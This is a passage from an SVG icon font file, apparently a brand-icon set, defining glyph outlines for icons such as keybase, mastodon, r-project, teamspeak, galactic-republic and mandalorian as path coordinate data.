c-16.0996 -19.8008 -35.2998 -25.5 -61.8994 -25.5c-39.5 0 -60.6006 20.8994 -60.6006 45c0 3.19922 0.200195 6.19922 0.700195 9c-8.40039 -32.3008 -36.4004 -54.2002 -73.2998 -54.2002c-23.2998 0 -45.1006 8.2998 -58.7002 24.8994
c0 -6.59961 -0.400391 -13.1992 -1.09961 -19.5h-31.5c0.5 10.2002 1.09961 22.8008 1.09961 33.1006v169.5h32.0996v-80.6006c15.7002 18.7002 37.4004 24.2002 58.7002 24.2002c35.7002 0 75.4004 -24.0996 75.4004 -76.2002c0 -5.59961 -0.5 -11 -1.5 -16.1992
c7.09961 24.3994 34.2998 33.5 76.7002 34.3994c13.6992 0.299805 29 0.400391 41.6992 0.400391v3.39941c0 23.4004 -15 33 -41 33c-19.2998 0 -33.5996 -8 -35 -21.7998h-33.6992c3.59961 34.4004 39.6992 43.1006 71.5 43.1006c27.3994 0 51.7998 -7 63.2998 -26
l-10.9004 20.5996h37.5l54.9004 -109.9zM243.7 134.2c29.7998 0 50.2002 21.5 50.2002 53.7998c0 32.4004 -20.4004 53.7998 -50.2002 53.7998c-29.6006 0 -50.2002 -21.3994 -50.2002 -53.7998c0 -32.2998 20.5996 -53.7998 50.2002 -53.7998zM444.6 181.5v3.2998
c-11.7998 0 -26.2998 -0.0996094 -39.3994 -0.599609c-29.1006 -0.900391 -47.2002 -6.2002 -47.2002 -25.2998c0 -12.4004 9.90039 -25.8008 35 -25.8008c33.7002 0 51.5996 18.4004 51.5996 48.4004zM32.7002 179.9c3.5 -58.3008 79.2002 -57.4004 91.2002 -21.6006
h33.0996c-6.40039 -34.3994 -43 -46.0996 -74.4004 -46.0996c-57.1992 0 -82.5 31.5 -82.5 74c0 46.7998 26.2002 77.5996 83 77.5996c45.3008 0 78.4004 -23.7002 78.4004 -75.3994v-8.5h-128.8zM127.7 201.3c-2.2998 54.7002 -87.5 56.6006 -94.4004 0h94.4004z" />
    <glyph glyph-name="keybase" unicode="&#xf4f5;" horiz-adv-x="412" 
d="M177.2 17.0996c0 -9.7998 -8 -17.7998 -17.7998 -17.7998c-9.80078 0 -17.8008 8 -17.8008 17.7998c0 9.80078 8 17.8008 17.8008 17.8008c9.7998 0.0996094 17.7998 -7.90039 17.7998 -17.8008zM270 35c9.7998 0 17.7998 -8 17.7998 -17.7998
s-8 -17.7998 -17.7998 -17.7998s-17.7998 8 -17.7998 17.7998s8 17.7998 17.7998 17.7998zM412.3 71c0 -38.9004 -7.59961 -73.9004 -22.2002 -103h-27.2998c23.5 38.7002 30.5 94.7998 22.4004 134.3c-16.1006 -29.5 -52.1006 -38.5996 -85.9004 -28.7998
c-127.8 37.5 -192.5 -19.7002 -234.6 -50.2998l18.8994 59.2998l-39.8994 -42.2998c4.7998 -26.7002 15.7002 -51.2998 31.2002 -72.2998h-28.8008c-9.69922 15.7998 -17.1992 33 -22.1992 51.2998l-23.8008 -25.2002c0 74.9004 -5.5 147.6 61.5 215.2
c20.2002 20.3994 43.7002 36.2002 69.1006 46.7002c-6.7998 13.5 -9.5 29.1992 -7.7998 46l-19.9004 1.19922c-17.9004 1.10059 -31.5996 16.5 -30.5996 34.4004v0.0996094l1.59961 26.2002c1.09961 17.1006 15.4004 30.6006 32.5 30.6006
c1.2998 0 -0.299805 0.0996094 28.2002 -1.7002c13.8994 -0.799805 21.5 -9.7998 22.7998 -11.4004c7.09961 10.4004 14.5 20.5 24.5996 34.5l20.6006 -12.0996c-13.6006 -29 -9.10059 -36.2002 -9 -36.2998c3.89941 0 13.8994 0.5 32.3994 -5.7002
c19.9004 -6.60059 35.9004 -20.7002 44.9004 -39.7002c0.400391 -0.900391 15.5 -29 1.2002 -62.5996c19 -6.10059 51.2998 -19.9004 82.3994 -51.8008c36.6006 -37.5996 57.7002 -87.3994 57.7002 -136.6zM128 325.7c3.2002 10 7.7002 19.7002 13.0996 29.3994
c0.100586 2 2.2002 13.1006 -7.7998 13.8008c-28.5 1.7998 -26.2998 1.59961 -26.7002 1.59961c-4.59961 0 -8.2998 -3.5 -8.59961 -8.09961l-1.59961 -26.2002c-0.300781 -4.7002 3.39941 -8.7998 8.09961 -9.10059zM153.8 263.9
c5.60059 -9.40039 14.1006 -16.1006 22.2998 -20c0 21.1992 28.5 41.8994 52.8008 17.5l8.39941 -10.3008c20.7998 18.8008 19.4004 45.3008 12.1006 60.9004c-13.8008 29.0996 -46.9004 32 -54.3008 31.7002c-10.2998 -0.400391 -19.6992 5.39941 -23.6992 15.2998
c-13.7002 -21.2002 -37.2002 -62.5 -17.6006 -95.0996zM236.7 195.5l-19.7002 -16.0996c-1.90039 -1.60059 -2.2002 -4.40039 -0.599609 -6.30078l8.89941 -10.8994c1 -1.2002 3.7998 -2.7002 6.2998 -0.600586l19.6006 16l5.5 -6.7998c4.89941 -6 13.7998 1.40039 9 7.2998
c-63.6006 78.3008 -41.5 51.1006 -55.2998 68.1006c-4.7002 6 -13.9004 -1.40039 -9 -7.2998c1.89941 -2.30078 18.3994 -22.6006 19.7998 -24.3008l-9.60059 -7.89941c-4.59961 -3.7998 2.60059 -13.2998 7.40039 -9.40039l9.7002 8zM355.1 169.8
c-16.8994 23.7002 -42.5996 46.7002 -73.3994 60.4004c-7.90039 3.5 -15 6.09961 -22.9004 8.59961c-2 -2.2002 -4.09961 -4.2998 -6.39941 -6.2002l31.8994 -39.1992c10.4004 -12.7002 8.5 -31.5 -4.2002 -41.9004c-1.2998 -1.09961 -13.0996 -10.7002 -29 -4.90039
c-2.89941 -2.2998 -10.0996 -9.89941 -22.1992 -9.89941c-8.60059 0 -16.6006 3.7998 -22.1006 10.5l-8.89941 10.8994c-6.30078 7.80078 -7.90039 17.9004 -5 26.8008c-8.2002 9.89941 -8.30078 21.2998 -4.60059 30c-7.2002 1.2998 -26.7002 6.19922 -42.7002 21.3994
c-55.7998 -20.7002 -88 -64.3994 -101.3 -91.2002c-14.8994 -30.1992 -18.7998 -60.8994 -19.8994 -90.1992c8.19922 8.69922 -3.90039 -4.10059 114 120.899l-29.9004 -93.5996c57.7998 31.0996 124 36 197.4 14.3994c23.5996 -6.89941 45.0996 -1.59961 56 13.9004
c11.0996 15.5996 8.5 37.7002 -6.80078 59.2998zM110.6 340.7l1 15.5996l15.6006 -1l-1 -15.5996z" />
    <glyph glyph-name="mastodon" unicode="&#xf4f6;" horiz-adv-x="417" 
d="M417.8 268.9c0 0 0.799805 -71.7002 -9 -121.5c-6.2002 -31.6006 -55.0996 -66.2002 -111.2 -72.9004c-20.0996 -2.40039 -93.0996 -14.2002 -178.699 6.7002c0 -4.90039 0.299805 -9.5 0.899414 -13.9004c6.60059 -49.5996 49.2002 -52.5996 89.6006 -54
c40.7998 -1.2998 77.0996 10.1006 77.0996 10.1006l1.7002 -36.9004s-28.5 -15.2998 -79.2998 -18.0996c-28 -1.60059 -62.8008 0.699219 -103.301 11.3994c-112.199 29.7002 -105.6 173.4 -105.6 289.101c0 97.1992 63.7002 125.699 63.7002 125.699
c61.8994 28.4004 227.899 28.7002 290.399 0c0 0 63.7002 -28.5 63.7002 -125.699zM342.7 143.7c0 122 5.2998 147.7 -18.4004 175c-25.7002 28.7002 -79.7002 31 -103.8 -6.10059l-11.5996 -19.5l-11.6006 19.5c-24 36.9004 -77.8994 35 -103.8 6.10059
c-23.5996 -27.1006 -18.4004 -52.9004 -18.4004 -175h46.7002v114.2c0 49.6992 64 51.5996 64 -6.90039v-62.5h46.2998v62.5c0 58.5 64 56.5996 64 6.90039v-114.2h46.6006z" />
    <glyph glyph-name="r-project" unicode="&#xf4f7;" horiz-adv-x="581" 
d="M581 221.4c0 -54.8008 -33.9004 -104.301 -88.4004 -139.7l67.4004 -113.7h-112l-40.0996 75.4004c-21.8008 -6.5 -45.1006 -11.2002 -69.4004 -13.9004v-61.5h-99.0996v61.9004c-136.101 16.0996 -239.4 95.6992 -239.4 191.5c0 107.5 130.1 194.6 290.5 194.6
s290.5 -87.0996 290.5 -194.6zM114.2 206.9c0 -52.8008 51.0996 -98.4004 125.2 -119.9v208.3h199s90.5996 -1.59961 90.5996 -87.8994c0 -86.3008 -86.5996 -92.7002 -86.5996 -92.7002s17.5996 -5.2998 27.7998 -10.5c1.7002 -0.799805 4 -2.10059 6.39941 -3.7002
c43.8008 21.4004 70.3008 56.2998 70.3008 106.4c0 92.2998 -90 133 -211.9 133s-220.8 -59.5 -220.8 -133zM339.3 168.6c49.6006 0 87.7998 -8.19922 87.7998 28.3008c0 34.0996 -30 27.2998 -87.7998 27.2998v-55.6006zM338.4 96.0996v-22.0996
c17.5996 0.0996094 34.5 1 50.5996 2.90039c-5.09961 7.5 -13.2002 19.1992 -24 19.1992h-26.5996z" />
    <glyph glyph-name="researchgate" unicode="&#xf4f8;" 
d="M0 416h448v-448h-448v448zM262.2 81.5996v7.30078c-10 0 -20 6.89941 -27.2002 14.6992c-12.2002 13.3008 -28.5996 34.7002 -42.2002 58.9004c22.5 5.2998 39.2002 26.4004 39.2002 47.5c0 31.2002 -24.2002 45.5996 -55.9004 45.5996
c-17.7998 0 -45.0996 -1.59961 -70.8994 -0.599609v-8.09961c15.5996 -2.90039 22 -1.30078 22 -23.9004v-109.4c0 -22.5996 -6.5 -21 -22 -23.8994v-8.10059c7.5 0.200195 20.5 0.800781 33.5996 0.800781c12.5 0 28.7002 -0.5 35.6006 -0.800781v8.10059
c-19.8008 2.7002 -25.8008 0.399414 -25.8008 23.8994v46.4004c6.7002 -0.599609 12.5 -0.599609 21.4004 -0.599609c16.9004 -30.3008 33 -53 42.2002 -63.6006c16.7998 -20.2002 43.3994 -17.2002 50 -14.2002zM285.1 216.6c38.7002 0 34 29.4004 34 49.9004h-30.3994
v-10.7002h17.8994c0 -15.8994 -7.39941 -26.7998 -21.5 -26.7998c-11.2998 0 -17.8994 9.90039 -17.8994 23.2998v26.7998c0 12.4004 11.7998 19.7002 19.7002 19.7002c14.1992 0 19.6992 -12.5 19.6992 -12.5l10.7002 7.2002s-5.2002 17.9004 -30.3994 17.9004
c-25.2002 0 -34 -18.2002 -34 -30.4004v-32.2002c0 -16.5 8.89941 -32.2002 32.1992 -32.2002zM168.6 171.9c-9.39941 0 -13.5996 0.299805 -20 0.799805v69.7002c6.40039 0.599609 15 0.599609 22.5 0.599609c23.3008 0 37.2002 -12.2002 37.2002 -34.5
c0 -21.9004 -15 -36.5996 -39.7002 -36.5996z" />
    <glyph glyph-name="teamspeak" unicode="&#xf4f9;" horiz-adv-x="511" 
d="M244.2 101.2c-2.40039 -12.5 -10.6006 -20 -22.5 -24.2998c-9.2002 -3.2002 -50.1006 -1.60059 -61.7002 -1c-18 1.2998 -33.2002 8.5 -43.4004 24c-14.5 22.5 -19.5 47.6992 -14.5 73.8994c4.60059 24.5 24.6006 34.7002 46.3008 22.7002
c15.1992 -7.5 42.5 -27.4004 63.3994 -46.5996c20.4004 -18.7002 34.7998 -36.4004 32.4004 -48.7002zM449.2 80.4004c6.7002 -5.40039 11.2002 -22 11.5996 -32.1006c1 -50.3994 -23.8994 -68 -46.5996 -85.3994c-65.1006 -50 -295.101 -16.9004 -145.4 -6.40039
c127.4 9 164.101 96.0996 172.101 121.5c1.09961 3.40039 5.2998 4.7998 8.2998 2.40039zM511.2 202.8c0 -17.2002 1.89941 -34.5996 -1 -51.7002c-4 -24.6992 -29.1006 -41.6992 -53.2002 -36.6992c-7.2002 1.69922 -9.40039 7.19922 -9.40039 14.1992
c0 28.1006 0.800781 56.4004 0 84.6006c-1.89941 75.7998 -36.1992 132.8 -102.3 169.399c-111 60.4004 -253.2 -7 -277.8 -131.5c-6.09961 -30.3994 -1.7002 -48.2998 -3.7002 -125.8c-0.299805 -7.2002 -4.2998 -11.2002 -12 -11.5
c-30.7998 -1.39941 -51.7998 18.2002 -51.7998 49v20.9004l0.799805 26.5c2.40039 15.5 10.7002 27 24.9004 34c3.5 1.7998 5.7002 3.5 6.39941 7.7998c6.10059 33.4004 19.5 64 39.3008 91.7002c2.2998 3.09961 4 5.2998 1 9.2998c-3.7002 5.40039 -1 10.2002 3 14.5
c28.0996 31.7998 61.8994 55.0996 102 67.4004c95.7998 29.3994 180.1 9.2998 252.3 -60.5c6.7002 -6.40039 15.5 -12.9004 7 -24.4004c-1.2998 -1.7998 1.09961 -3.5 2.2002 -5c20.6992 -28 34.1992 -59.4004 40.3994 -93.5996
c0.900391 -3.7002 3 -5.10059 5.90039 -6.40039c17.3994 -8.7998 25.7002 -23.2998 26 -42.2002zM351.6 71.2998l-51.5996 7.7002c-22.7998 5.90039 -51 32.7002 22.2002 60.7998c21.5996 8.5 85.7002 37.2002 87.7998 -8c0.900391 -32 -21.9004 -63.2998 -58.4004 -60.5z
" />
    <glyph glyph-name="first-order-alt" unicode="&#xf50a;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM248 -48.21c132.66 0 240.21 107.55 240.21 240.21s-107.55 240.21 -240.21 240.21s-240.21 -107.55 -240.21 -240.21s107.55 -240.21 240.21 -240.21z
M248 411.71c121.34 0 219.71 -98.3701 219.71 -219.71s-98.3701 -219.71 -219.71 -219.71s-219.71 98.3701 -219.71 219.71s98.3701 219.71 219.71 219.71zM248 -19.5098c116.81 0 211.51 94.7002 211.51 211.51s-94.7002 211.51 -211.51 211.51
s-211.51 -94.6895 -211.51 -211.51s94.7002 -211.51 211.51 -211.51zM434.23 143.47c-3.69141 -14.209 -12.709 -36.0225 -20.1309 -48.6895l-74.1299 35.8799l61.4805 -54.8203c-8.85352 -11.7021 -25.5195 -28.4082 -37.2002 -37.29l-54.7998 61.5703l35.8799 -74.2705
c-12.6445 -7.45215 -34.4307 -16.5156 -48.6299 -20.2295l-27.29 78.4697l4.79004 -82.9297c-8.61035 -1.17969 -17.4004 -1.7998 -26.3301 -1.7998s-17.7197 0.620117 -26.3301 1.7998l4.75977 82.46l-27.1494 -78.0303c-14.2021 3.70996 -35.998 12.7588 -48.6504 20.2002
l35.9297 74.3398l-54.8701 -61.6396c-11.6836 8.87988 -28.3584 25.582 -37.2197 37.2793l61.5898 54.9004l-74.2598 -35.9297c-7.42383 12.667 -16.4463 34.4795 -20.1396 48.6895l77.8398 27.1104l-82.2305 -4.75977c-1.15918 8.56934 -1.7793 17.3193 -1.7793 26.21
c0 9 0.629883 17.8398 1.81934 26.5098l82.3799 -4.76953l-77.9395 27.1592c3.71973 14.208 12.7822 36.0127 20.2295 48.6699l74.2207 -35.9199l-61.5205 54.8604c8.88086 11.6836 25.582 28.3584 37.2803 37.2197l54.7598 -61.5293l-35.8301 74.1699
c12.6562 7.41895 34.4521 16.4375 48.6504 20.1299l26.8701 -77.25l-4.70996 81.6094c8.60938 1.18066 17.3896 1.80078 26.3193 1.80078c8.93066 0 17.71 -0.620117 26.3203 -1.80078l-4.74023 -82.1592l27.0498 77.7598c17.2705 -4.5 33.6006 -11.3506 48.6309 -20.1699
l-35.8203 -74.1201l54.7197 61.4697c11.6924 -8.86133 28.376 -25.54 37.2402 -37.2295l-61.4502 -54.7705l74.1201 35.8604c7.43945 -12.6533 16.4893 -34.4492 20.2002 -48.6504l-77.8105 -27.0996l82.2402 4.75c1.19043 -8.66016 1.82031 -17.5 1.82031 -26.4902
c0 -8.87988 -0.610352 -17.6299 -1.78027 -26.1904l-82.1201 4.75z" />
    <glyph glyph-name="fulcrum" unicode="&#xf50b;" horiz-adv-x="269" 
d="M70.75 283.86l-35.3799 -43.5508l-35.3701 43.5508l35.3799 43.5498zM119.23 448v-211.11l-41.0801 -44.8896l41.0801 -44.8896v-211.11l-20.5303 198.18l-50.9805 57.8203l50.9707 57.8203zM198.9 283.86l35.3799 43.5498l35.3799 -43.5498l-35.3799 -43.5508z
M150.42 236.89v211.11l20.54 -198.18l50.9805 -57.8203l-50.9805 -57.8203l-20.54 -198.18v211.11l41.0801 44.8896z" />
    <glyph glyph-name="galactic-republic" unicode="&#xf50c;" horiz-adv-x="496" 
d="M248 -56c-136.75 0 -248 111.25 -248 248s111.25 248 248 248s248 -111.25 248 -248s-111.25 -248 -248 -248zM248 423.47c-127.63 0 -231.47 -103.84 -231.47 -231.47s103.84 -231.47 231.47 -231.47s231.47 103.84 231.47 231.47s-103.84 231.47 -231.47 231.47z
M275.62 401.66c37.6602 -4.91016 72.21 -19.7402 100.96 -41.7998l-17.3896 -17.3604c-20.6758 15.3154 -58.1152 30.7891 -83.5703 34.54v24.6201zM220.25 401.59v-24.54c-30.9697 -4.60938 -59.4502 -16.8301 -83.5195 -34.6699h-0.0800781l-17.2803 17.3604
c28.7197 22.0498 63.2402 36.9102 100.88 41.8496zM232.5 351.42h31v-82.8604c10.0498 -2.0293 19.3701 -6.00977 27.6201 -11.5l58.6699 58.6709l21.9297 -21.9307l-58.6699 -58.6699c5.46973 -8.24023 9.48047 -17.5996 11.5 -27.6201h82.8701v-31h-82.8701
c-2.03027 -10.0195 -6.04004 -19.3096 -11.5 -27.54l58.6699 -58.6895l-21.9297 -21.9307l-58.6699 58.6904c-8.25 -5.49023 -17.5703 -9.52051 -27.6201 -11.5498v-82.9004h-31v82.9004c-8.25781 1.66895 -20.6533 6.80762 -27.6699 11.4697l-58.6201 -58.6201
l-21.9297 21.9297l58.6699 58.6904c-5.45996 8.23047 -9.4502 17.5205 -11.4697 27.54h-82.9004v31h82.9004c2.01953 10.0303 6 19.3896 11.4697 27.6201l-58.6699 58.6699l21.9297 21.9297l58.6201 -58.5898c8.25 5.48047 17.6299 9.38965 27.6699 11.4199v82.8701z
M415.74 320.7c22.0996 -28.7402 36.9795 -63.3398 41.9297 -101.03h-24.6201c-3.7832 25.4902 -19.3154 62.9746 -34.6699 83.6699zM80.1904 320.57l17.3896 -17.3906c-17.8301 -24.0693 -29.9902 -52.5596 -34.5898 -83.5195h-24.6504
c4.94043 37.6494 19.79 72.1895 41.8506 100.91zM38.3398 164.33l24.6504 0.00976562c4.58984 -30.9502 16.7002 -59.4502 34.5098 -83.5195l-17.3604 -17.3906c-22.0498 28.7207 -36.8799 63.2607 -41.7998 100.9zM433.04 164.33h24.6201
c-4.9502 -37.6699 -19.8506 -72.2197 -41.9297 -100.96l-17.3604 17.3604c17.8701 24.0996 30.0596 52.6094 34.6699 83.5996zM136.66 41.6201c24.0703 -17.8604 52.6094 -30.0205 83.5996 -34.6504v-24.6396c-37.6602 4.9502 -72.2295 19.8398 -100.96 41.9297z
M359.19 41.5703h0.0791016l17.3105 -17.3906c-28.75 -22.0596 -63.29 -36.9297 -100.96 -41.8496v24.5703c30.9902 4.58984 59.4795 16.8301 83.5703 34.6699z" />
    <glyph glyph-name="galactic-senate" unicode="&#xf50d;" horiz-adv-x="512" 
d="M249.86 414.52h12.2793v-26.0693c13.5801 -20.6201 23.8604 -108.59 24.4902 -215.351c-11.7402 15.6201 -19.1299 33.3301 -19.1299 48.2402v16.8799c0.0302734 5.32031 -0.75 10.5303 -2.19043 15.6504c-0.649414 2.13965 -1.38965 4.07031 -2.61914 5.82031
c-1.23047 1.73926 -3.44043 3.79004 -6.68066 3.79004c-3.25 0 -5.4502 -2.04004 -6.67969 -3.79004c-1.23047 -1.74023 -1.96973 -3.68066 -2.62012 -5.82031c-1.44043 -5.12012 -2.21973 -10.3301 -2.19043 -15.6504v-16.8799
c0 -14.9102 -7.38965 -32.6201 -19.1299 -48.2402c0.610352 106.761 10.8906 194.73 24.4707 215.351v26.0693zM223.52 266.75c-1.59961 -22.4004 -2.75 -46.5195 -3.47949 -72.0703c-23.2998 -11.2793 -40.7705 -33.1602 -46.3203 -59.5098
c-7.71973 -2.25977 -22.71 -3.91992 -40.4893 -4.21973c-7.51074 3.66016 -16.5 5.85938 -26.1807 6.04004c1.90039 14.9102 5.87012 29.1699 11.6504 42.4199c15.4395 -8.10059 30.9297 -8.66016 35.4697 -0.959961c4.57031 7.74023 -3.58984 21.04 -18.3203 30.6602
c8.68066 11.7695 18.9805 22.2998 30.5605 31.0898c9.50977 -15.5898 23.3594 -24.4404 31.3594 -19.8203c8.05078 4.65039 7.19043 21.1699 -1.70996 37.29c8.76074 3.88965 17.9404 6.92969 27.46 9.08008zM288.48 266.75
c7.82227 -1.75977 20.1201 -5.82812 27.4492 -9.08008c-8.89941 -16.1299 -9.75977 -32.6396 -1.70996 -37.29c8 -4.62012 21.8506 4.23047 31.3604 19.8203c11.5801 -8.79004 21.8799 -19.3203 30.5596 -31.0898c-14.7197 -9.61035 -22.8896 -22.9199 -18.3193 -30.6602
c4.54004 -7.7002 20.0293 -7.14062 35.4697 0.959961c5.79004 -13.25 9.75 -27.5098 11.6504 -42.4199c-9.68066 -0.19043 -18.6709 -2.37988 -26.1807 -6.04004c-17.7793 0.299805 -32.7695 1.95996 -40.4902 4.21973c-5.5498 26.3496 -23.0293 48.2305 -46.3193 59.5098
c-0.719727 25.5508 -1.87988 49.6699 -3.46973 72.0703zM256 258.15c3.23047 0 5.86035 -8.81055 6.08984 -19.9307h0.0498047v-16.8799c0 -41.4199 49.0107 -95.04 93.4902 -95.04c52 0 122.76 1.4502 156.37 -29.1699v-2.50977
c-9.41992 -17.1104 -20.5801 -33.1699 -33.1797 -47.9697c-12.5303 21.0898 -51.5898 40.96 -108.021 41.3496c-45.6797 -1.01953 -79.0195 -20.3301 -90.7598 -40.8701c-0.00976562 -0.00976562 0.00976562 -0.0400391 0 -0.0498047
c-7.66992 -2.13965 -15.8496 -3.23047 -24.04 -3.20996c-8.19043 -0.0205078 -16.3701 1.07031 -24.04 3.20996c-0.00976562 0.00976562 0.00976562 0.0400391 0 0.0498047c-11.7295 20.54 -45.0801 39.8506 -90.7598 40.8701
c-56.4307 -0.400391 -95.5 -20.2598 -108.021 -41.3496c-12.5996 14.7998 -23.7598 30.8496 -33.1797 47.9697v2.50977c33.6201 30.6201 104.37 29.1699 156.37 29.1699c44.4795 0 93.4902 53.6201 93.4902 95.04v16.8799h0.0498047
c0.229492 11.1201 2.85938 19.9307 6.08984 19.9307zM256 161.56c-22.4199 0 -40.5996 -18.1797 -40.5996 -40.5996s18.1797 -40.6504 40.5996 -40.6504s40.5996 18.2305 40.5996 40.6504s-18.1797 40.5996 -40.5996 40.5996zM256 153.92
c18.1904 0 32.96 -14.7695 32.96 -32.96s-14.7695 -32.96 -32.96 -32.96s-32.96 14.7695 -32.96 32.96s14.7695 32.96 32.96 32.96zM256 147.78c-14.8096 0 -26.8203 -12.0107 -26.8203 -26.8203s12.0107 -26.8203 26.8203 -26.8203s26.8203 12.0107 26.8203 26.8203
s-12.0107 26.8203 -26.8203 26.8203zM141.2 81.1104c18.75 -0.419922 35.1895 -4.18066 48.6094 -9.66992c12.5508 -16.0303 29.1602 -30.04 49.5801 -33.0703c0.100586 -0.00976562 0.169922 -0.0302734 0.270508 -0.0498047
c0.0498047 -0.0107422 0.109375 -0.0400391 0.160156 -0.0507812c5.23926 -1.06934 10.6396 -1.59961 16.1895 -1.59961c5.56055 0 10.9502 0.530273 16.1904 1.59961c0.0498047 0.0107422 0.109375 0.0400391 0.160156 0.0507812
c0.0996094 0.00976562 0.179688 0.0292969 0.269531 0.0498047c20.4199 3.04004 37.04 17.04 49.5801 33.0703c13.4199 5.5 29.8496 9.25 48.6104 9.66992c10.1797 -0.0800781 21.5996 -0.360352 30.5 -1.66016c-0.430664 -4.41992 -1.51074 -18.6299 -7.11035 -29.7598
c-9.11035 2.55957 -18.3604 3.89941 -27.6201 3.89941c-41.2803 -0.939453 -71.4795 -34.3496 -78.2598 -74.4697l-0.110352 -4.7002c-10.3994 -1.91992 -21.1797 -2.93945 -32.21 -2.93945c-11.0195 0 -21.8096 1.0293 -32.21 2.93945l-0.109375 4.7002
c-6.78027 40.1201 -36.9805 73.5303 -78.2607 74.4697c-9.25977 0 -18.5098 -1.33984 -27.6201 -3.89941c-5.59961 11.1299 -6.67969 25.3398 -7.10938 29.7598c8.89941 1.2998 20.3096 1.58984 30.5 1.66016z" />
    <glyph glyph-name="jedi-order" unicode="&#xf50e;" 
d="M398.5 74.4004c0 0 26.2998 16.1992 49.9004 77.6992c0 0 -17 -183.3 -222 -185.699h-4.10059c-205.1 2.39941 -222 185.699 -222 185.699c23.2002 -61.5996 49.4004 -77.6992 49.4004 -77.6992c-95.9004 122.1 -17.2002 233.1 -17.2002 233.1
c-45.4004 -85.7002 41.4004 -170.5 41.4004 -170.5c-105 171.6 60.5 271.5 60.5 271.5c-96.9004 -72.5996 10.0996 -190.7 10.0996 -190.7c-85.7998 -158.399 68.5996 -230.1 68.5996 -230.1s0.400391 16.8994 2.2002 85.7002l-34.5 -36.2002l24.2002 47.3994
l-62.5996 9.10059l62.5996 9.09961l-20.2002 55.5l31.4004 -45.8994c2.2998 87.8994 7.89941 305.899 7.89941 306.899v2.40039v-1v1v-2.40039c0.100586 -1.7998 5.7002 -219.2 7.90039 -306.899l31.4004 45.8994l-20.2002 -55.5l62.5996 -9.09961l-62.5996 -9.10059
l24.2002 -47.3994s-30.2002 31.7002 -34.5 36.2002c1.7998 -68.8008 2.19922 -85.7002 2.19922 -85.7002s154.4 71.7002 68.6006 230.1c0 0 107 118 10.0996 190.7c0 0 165.5 -100 60.5 -271.5c0 0 86.7998 84.7002 41.4004 170.5c0 0 78.7002 -111 -17.2002 -233.1z" />
    <glyph glyph-name="mandalorian" unicode="&#xf50f;" horiz-adv-x="390" 
d="M203.28 -63.8896c-0.980469 3.25977 -1.69043 15.8301 -1.39062 24.5801c0.550781 15.8896 0.980469 24.7197 1.40039 28.7598c0.639648 6.2002 2.87012 20.7197 3.28027 21.3799c0.599609 0.959961 0.399414 27.8701 -0.240234 33.1299
c-0.310547 2.58008 -0.629883 11.9004 -0.69043 20.7305c-0.129883 16.4697 -0.529297 20.1191 -2.72949 24.7598c-1.10059 2.31934 -1.23047 3.83984 -0.990234 11.4297c0.160156 4.81055 0 10.5303 -0.339844 12.71c-2.0498 12.9697 -3.45996 27.7002 -3.25 33.9004
c0.209961 6.12012 0.429688 7.14941 2.05957 9.66992c3.05078 4.70996 6.51074 14.04 8.62012 23.2695c2.25977 9.86035 3.87988 17.1807 4.58984 20.7402c0.890625 4.41992 2.43066 9.71973 4.36035 15.0498c2.27051 6.25 2.49023 15.3906 0.370117 15.3906
c-0.299805 0 -1.37988 -1.2207 -2.41016 -2.70996c-1.03027 -1.49023 -4.75977 -4.80078 -8.29004 -7.36035c-8.37012 -6.08008 -11.7002 -9.38965 -12.6602 -12.5801c-0.929688 -3.11035 -1.01953 -7.22949 -0.160156 -7.75977
c0.34082 -0.209961 1.29004 -2.40039 2.11035 -4.87988c1.62012 -4.87988 1.87012 -10.1201 0.719727 -15.3604c-0.389648 -1.76953 -1.0498 -5.46973 -1.45996 -8.22949c-0.410156 -2.76074 -0.979492 -6.46094 -1.25 -8.2207
c-0.279297 -1.75977 -0.969727 -3.67969 -1.5498 -4.25977c-0.959961 -0.959961 -1.13965 -0.910156 -2.0498 0.530273c-0.549805 0.870117 -1.2002 3.00977 -1.44043 4.75c-0.25 1.73926 -1.62988 7.10938 -3.08008 11.9297
c-3.2793 10.9004 -3.51953 16.1504 -0.959961 20.96c0.919922 1.73047 1.66992 3.81055 1.66992 4.61035c0 2.38965 -2.19922 5.31934 -7.40918 9.88965c-7.05078 6.17969 -8.62988 7.91992 -10.2305 11.2998c-1.70996 3.60059 -3.05957 4.06055 -4.54004 1.54004
c-1.78027 -3.00977 -2.59961 -9.10938 -2.96973 -22.0195l-0.350586 -12.1299l1.9502 -2.25c3.20996 -3.7002 12.0703 -16.4502 13.7803 -19.8301c3.41016 -6.74023 4.33984 -11.6904 4.41016 -23.5605c0.0703125 -11.8398 0.950195 -22.75 2 -24.71
c0.359375 -0.660156 0.509766 -1.34961 0.339844 -1.51953s0.410156 -2.08984 1.29004 -4.27051c0.879883 -2.17969 1.80957 -6.21973 2.05957 -8.97949s1.02051 -7.43066 1.70996 -10.3701c2.23047 -9.56055 2.77051 -14.0801 2.39062 -20.1396
c-0.200195 -3.27051 -0.530273 -11.0703 -0.730469 -17.3203c-1.30957 -41.7598 -1.84961 -57.9805 -2.04004 -61.21c-0.120117 -2.02051 -0.389648 -11.5098 -0.599609 -21.0703c-0.360352 -16.2998 -1.2998 -27.3701 -2.41992 -28.6494
c-0.640625 -0.730469 -8.07031 4.90918 -12.5205 9.48926c-3.75 3.87012 -4.01953 4.79004 -2.83008 9.9502c0.700195 3.00977 2.26074 18.29 3.33008 32.6201c0.360352 4.78027 0.810547 10.5 1.01074 12.71c0.830078 9.37012 1.65918 20.3496 2.60938 34.7803
c0.560547 8.45996 1.33008 16.4395 1.7207 17.7295c0.379883 1.29004 0.889648 9.89062 1.12988 19.1104l0.429688 16.7695l-2.25977 4.30078c-1.7207 3.2793 -4.87012 6.93945 -13.2207 15.3398c-6.0293 6.06934 -11.8398 12.2998 -12.9092 13.8496l-1.9502 2.81055
l0.75 10.8994c1.08984 15.71 1.09961 48.5703 0.0195312 59.0605l-0.889648 8.69922l-3.28027 4.52051c-5.85938 8.08008 -5.7998 7.75 -6.21973 33.2695c-0.0996094 6.07031 -0.379883 11.5 -0.629883 12.0605c-0.830078 1.87012 -3.0498 2.66016 -8.54004 3.0498
c-8.86035 0.620117 -10.96 1.90039 -23.8506 14.5498c-6.14941 6.04004 -12.3398 11.9697 -13.75 13.1904c-2.80957 2.41992 -2.79004 1.99023 -0.55957 9.62988l1.34961 4.64941l-1.68945 3.04004c-0.929688 1.6709 -2.08984 3.51074 -2.58984 4.07031
